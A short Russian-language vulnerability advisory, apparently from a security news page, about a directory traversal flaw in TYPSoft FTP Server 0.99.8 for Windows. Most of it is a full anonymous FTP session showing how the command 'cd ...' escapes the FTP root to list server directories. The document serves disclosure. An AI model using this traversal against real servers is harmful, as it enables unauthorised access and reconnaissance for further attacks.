Marc Bergeron TYPSoft – FTP сервер для Windows систем, поддерживающий стандартные FTP команды, виртуальную архитектуру файловой системы, ограничение по IP адресам и
т.п. вещи. Уязвимость в программе позволяет удаленным нападающим загружать файлы на сервере вне корневого каталога. 

Уязвимость связанна с недостаточной фильтрацией последовательности «.» в URL запросах. Любой удаленный пользователь с законным или анонимным доступом к уязвимому TYPSoft FTP серверу может эксплуатировать уязвимость и свободно просмотреть структуру каталогов на уязвимой системе. Такая информация может оказаться полезной в последующих нападениях.

Пример:

C:\>ftp 10.20.30.40
Connected to 10.20.30.40.
220 TYPSoft FTP Server 0.99.8 ready…
User (10.20.30.40:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.

226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd /
250 CWD command successful. «/C:/Inetpub/ftproot/» is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.

226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd ..
550 ‘C:\Inetpub\ftproot\Inetpub\’: no such file or directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.

226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd …
250 CWD command successful. «/C:/Inetpub/ftproot/…/» is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.

AdminScripts
ftproot
iissamples
mailroot
Scripts
webpub
wwwroot
226 Transfer complete.
ftp: 78 bytes received in 0.01Seconds 7.80Kbytes/sec.
ftp> bye
221 Goodbye!

Уязвимость обнаружена в TYPSoft FTP Server version 0.99.8.



Оставить мнение